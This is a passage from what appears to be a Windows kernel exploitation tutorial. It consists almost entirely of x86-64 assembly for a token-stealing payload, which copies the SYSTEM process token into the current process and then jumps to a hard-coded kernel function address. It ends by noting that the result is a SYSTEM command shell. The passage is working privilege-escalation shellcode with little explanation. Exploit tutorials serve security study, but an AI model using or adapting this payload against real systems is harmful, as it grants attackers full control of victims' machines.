	mov     r9, qword ptr [rax+4B8h]				;copy SYSTEM process token to current process
	mov     qword ptr [r8+4B8h], r9					;
	pop		r8										;restire registers
	pop		r9										;
	pop		rcx										;
	pop		rax										;we are about to overwrite this one but stack allignment is a thing
	mov		rax, qword ptr [0b60f0200h]				;HaliQuerySystemInformation
	jmp		rax
	ret

TokenStealing ENDP

_TEXT	ENDS

End

And for our hard work we receive a nice SYSTEM command shell.

post2-kstack-success